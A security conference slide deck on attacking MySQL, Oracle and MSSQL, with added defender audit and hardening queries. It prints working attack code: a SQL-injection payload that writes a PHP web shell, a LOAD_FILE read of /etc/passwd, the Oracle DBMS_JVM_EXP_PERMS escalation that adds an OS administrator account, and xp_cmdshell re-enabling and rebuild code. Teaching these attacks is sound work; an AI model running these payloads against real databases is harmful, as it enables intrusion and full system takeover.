Rock'n Roll in Database Security
Prathan Phongthiproek (Lucifer@CITEC), Senior Information Security Consultant
ACIS Professional Center
Who am I?
- CITEC Evolution: code name "Lucifer", moderator, speaker; instructor for "Web Application (In)Security 101" and "Mastering in Exploitation"
- ACIS Professional Center: Red Team penetration tester, instructor / speaker, security consultant / researcher
- Founder of CWH Underground Hacker: exploit, vulnerability and paper disclosure on Milw0rm, Exploit-DB, SecurityFocus, Secunia, Zeroday, etc. http://www.exploit-db.com/author/?a=1275
Let's Talk!?
"Getting DBA privilege is good, but getting SHELL is better!!"
- MySQL PWNED!! From web application to SHELL
- Oracle privilege escalation XPL to get SHELL
- MSSQL credentials attack to get SHELL
MSSQL and Oracle Vulnerabilities
(Chart: published vulnerabilities per year, 2002 to 2009, two series: SQL Server and Oracle.)
MySQL Jump into OS
- MySQL 5.x vulnerability, 0-day on Immunity CANVAS
- SQL injection via web application (top hit!!)
  - MySQL OUTFILE function
    - Need a writable directory
    - Need the absolute path
    - Need magic_quotes_gpc off (the OUTFILE path is a quoted string literal, and magic_quotes escapes the quotes)
    - UNION SELECT 1,'code',3,4 INTO OUTFILE '/www/htdocs/shell.php'
  - MySQL LOAD_FILE function (better!!)
    - Need the absolute path
    - Need the phpMyAdmin path, or MySQL port 3306 open at the firewall
    - UNION SELECT 1,LOAD_FILE(0x4332…)
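The slide lists the attacker's prerequisites; the following is an added example (not from the slides) that shows the same two tricks next to the server-side conditions they depend on and the hardening that closes them. It assumes MySQL 5.x, an application account 'webapp'@'localhost', a hypothetical injectable four-column query over a table named posts, and a web root of /www/htdocs.

```sql
-- Added example, not from the slides. Assumptions: MySQL 5.x, application
-- account 'webapp'@'localhost', hypothetical table posts(id,title,body,author),
-- web root /www/htdocs.

-- 1. Both INTO OUTFILE and LOAD_FILE need the global FILE privilege on the
--    account the web application connects with. Audit from a DBA session:
SELECT user, host, File_priv FROM mysql.user WHERE File_priv = 'Y';

-- 2. Both are also confined by secure_file_priv (present since 5.0.38/5.1.17):
--    empty = anywhere the mysqld process can write, a directory = only there.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 3. The OUTFILE payload as it arrives through the injectable query. The PHP
--    body is a hex literal, so it needs no quotes and survives magic_quotes_gpc;
--    the OUTFILE path must be a quoted string literal (hex is a syntax error
--    there), which is why the slide requires magic_quotes off.
--    0x3c3f... decodes to:  <?php system($_GET['cmd']); ?>
SELECT id, title, body, author FROM posts WHERE id = -1
UNION SELECT 1, 0x3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e, 3, 4
  INTO OUTFILE '/www/htdocs/shell.php';

-- 4. LOAD_FILE does accept a hex argument, so it works even with magic_quotes on.
--    0x2f6574632f706173737764 is /etc/passwd.
SELECT id, title, body, author FROM posts WHERE id = -1
UNION SELECT 1, LOAD_FILE(0x2f6574632f706173737764), 3, 4;

-- 5. Hardening: the application account does not need FILE, and
--    secure_file_priv should name a directory outside the web root.
--    In my.cnf under [mysqld]:   secure_file_priv = /var/lib/mysql-files
REVOKE FILE ON *.* FROM 'webapp'@'localhost';
FLUSH PRIVILEGES;
```

Step 1 and step 5 are the check and the fix that matter most: without FILE on the web application's account, neither function returns anything regardless of magic_quotes or the web root's permissions.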
MySQL PWNED!! From web application to SHELL
Oracle Privilege Escalation XPL to get SHELL – PL/SQL Injection
PL/SQL injection exploits (Metasploit module names):
- dbms_cdc_publish3 – for Oracle 10gR1 to 11gR2
- dbms_cdc_publish2
- dbms_cdc_publish
- dbms_metadata_open
- dbms_export_extension
- lt_findricset_cursor
- lt_compressworkspace
- lt_mergeworkspace
- lt_removeworkspace
- lt_rollbackworkspace
Oracle Privilege Escalation XPL to get SHELL
- DBMS_JVM_EXP_PERMS: a package that lets any database user grant themselves Java I/O permissions
- CVE-2010-0866
- Affects Oracle 10g to 11g (Windows only)
- Defense:
  - Apply the October 2010 Critical Patch Update
  - Oracle 11gR2 on Windows still secure
  - Revoke the EXECUTE privilege on DBMS_JVM_EXP_PERMS from users
Oracle Privilege Escalation XPL to get SHELL
XPL code (grant Java I/O privilege):

```sql
-- Grant java.io.FilePermission <<ALL FILES>> execute to the current user
DECLARE
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  CURSOR C1 IS
    SELECT 'GRANT', USER(), 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLED' FROM DUAL;
BEGIN
  OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

-- Grant java.lang.RuntimePermission writeFileDescriptor
DECLARE
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  CURSOR C1 IS
    SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission', 'writeFileDescriptor', NULL, 'ENABLED' FROM DUAL;
BEGIN
  OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

-- Grant java.lang.RuntimePermission readFileDescriptor
DECLARE
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  CURSOR C1 IS
    SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission', 'readFileDescriptor', NULL, 'ENABLED' FROM DUAL;
BEGIN
  OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
```
Oracle Privilege Escalation XPL to get SHELL
XPL code (OS execute):

```sql
-- Add a local user through cmd.exe, then put it in the Administrators group
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper', 'main',
  'c:\\windows\\system32\\cmd.exe', '/c', 'net user prathan 1234 /add') FROM DUAL;

SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper', 'main',
  'c:\\windows\\system32\\cmd.exe', '/c', 'net localgroup administrators prathan /add') FROM DUAL;
```
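The defense slide names the mitigation but not the checks. The following is an added example (not from the slides, and not Oracle's own guidance) that a DBA would run as SYS on 10g/11g to see who can reach the package, to revoke it as the slide suggests, and to find out whether the grant-yourself-permissions block above has already been run. The account name APP_USER is an assumption.

```sql
-- Added example, not from the slides. Run as SYS on Oracle 10g/11g.
-- APP_USER is an assumed application account name.

-- 1. Who can execute the package? On an unpatched install PUBLIC holds
--    EXECUTE, which is why any session can run the XPL's IMPORT_JVM_PERMS call.
SELECT grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS' AND table_name = 'DBMS_JVM_EXP_PERMS';

-- 2. Mitigation from the slide: take it away from everyone who does not need it.
REVOKE EXECUTE ON SYS.DBMS_JVM_EXP_PERMS FROM PUBLIC;

-- 3. Has the attack already run? The rows it imports land in the Java policy
--    table; file or runtime permissions for anything other than the built-in
--    Java roles deserve a look.
SELECT grantee, type_name, name, action, enabled
  FROM dba_java_policy
 WHERE type_name IN ('java.io.FilePermission', 'java.lang.RuntimePermission')
   AND grantee NOT IN ('SYS', 'PUBLIC', 'JAVASYSPRIV', 'JAVADEBUGPRIV', 'JAVAUSERPRIV');

-- 4. Remove a stray grant found in step 3 (one call per row; these three match
--    exactly what the XPL slide grants).
BEGIN
  DBMS_JAVA.REVOKE_PERMISSION('APP_USER', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');
  DBMS_JAVA.REVOKE_PERMISSION('APP_USER', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', NULL);
  DBMS_JAVA.REVOKE_PERMISSION('APP_USER', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', NULL);
END;
/
```

Step 3 is the detection half: the patch stops new grants, but a policy row written before patching stays in place until it is revoked, and with it the ability to reach cmd.exe through DBMS_JAVA_TEST.FUNCALL as on the OS-execute slide.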
Oracle Privilege Escalation XPL to get SHELL
MSSQL Credentials Attack to get SHELL
- 'sa' is the God account; when the SQL Server service runs as SYSTEM on Windows, its OS commands run as SYSTEM
- The default 'sa' password is blank or guessable
- Requires the "xp_cmdshell" extended stored procedure (disabled by default on MSSQL 2005+)
- Enable it with osql on MSSQL 2005:

```sql
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
```
MSSQL Credentials Attack to get SHELL
On MSSQL 2000, if xp_cmdshell was dropped with sp_dropextendedproc, either re-register it from its DLL or rebuild it on top of the OLE automation procedures:

```sql
-- Option 1: re-register the extended procedure from the DLL that implements it
EXEC sp_addextendedproc 'xp_anyname', 'xplog70.dll'

-- Option 2: recreate xp_cmdshell as a normal stored procedure that drives
-- WScript.Shell through sp_OACreate / sp_OAMethod
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
SET @result = 0
-- instantiate the WScript.Shell COM object
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
-- WScript.Shell.Run(cmd, windowStyle=0 hidden, waitOnReturn=@Wait)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
```
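The two slides above show how the attacker switches the shell on; the following is an added example (not from the slides) of the matching audit and revert from the defender's side, covering both the xp_cmdshell setting and the OLE automation route that the rebuilt procedure depends on. It assumes sysadmin rights in sqlcmd or osql on SQL Server 2005 or later; the login name 'webapp' and the new name 'sa_renamed' are assumptions.

```sql
-- Added example, not from the slides. Run as sysadmin on SQL Server 2005+.
-- 'webapp' (application login) and 'sa_renamed' are assumed names.

-- 1. Is xp_cmdshell on, and is the sp_OACreate fallback usable? On 2005+ the
--    WScript.Shell rebuild above only works if 'Ole Automation Procedures' is 1.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
SELECT name, value_in_use
  FROM sys.configurations
 WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- 2. Does sa still accept a blank password, and is it enabled at all?
--    PWDCOMPARE returns 1 when the clear text matches the stored hash.
SELECT name, is_disabled,
       PWDCOMPARE('', password_hash) AS accepts_blank_password
  FROM sys.sql_logins
 WHERE name = 'sa';

-- 3. Who could turn xp_cmdshell back on? sp_configure needs sysadmin, so this
--    membership list is the one that matters.
SELECT sp.name, sp.type_desc
  FROM sys.server_principals AS sp
 WHERE IS_SRVROLEMEMBER('sysadmin', sp.name) = 1;

-- 4. Revert: close both shell routes, disable and rename sa, and keep the
--    application login out of sysadmin.
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
ALTER LOGIN sa DISABLE;
ALTER LOGIN sa WITH NAME = [sa_renamed];
EXEC sp_dropsrvrolemember 'webapp', 'sysadmin';
```

Disabling xp_cmdshell alone is not enough: a login in sysadmin can re-enable it with the same four lines the slide shows, so step 3 (who is sysadmin) and the blank-password check in step 2 are the controls that actually decide the outcome of the credentials attack.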
MSSQL Credentials Attack to get SHELL
Brute-force the 'sa' password and use the sa credentials to run OS commands on the target machine with Metasploit modules:
- scanner/mssql/mssql_ping
- scanner/mssql/mssql_login
- admin/mssql/mssql_exec
- windows/smb/psexec
IPWN4 – PenTest Tools (jail-broken iPhone 4)
- Command-line pen-test tools: Metasploit Framework, Social Engineering Toolkit, Nmap, Amap, Hping, Nbtscan, netcat, Nikto2, dnsmap, Ettercap-NG, Aircrack-NG
- GUI tools: iTeleport, Jaadu RDP, iNet, WiFiFoFum
Full Compromise of MSSQL via iPhone 4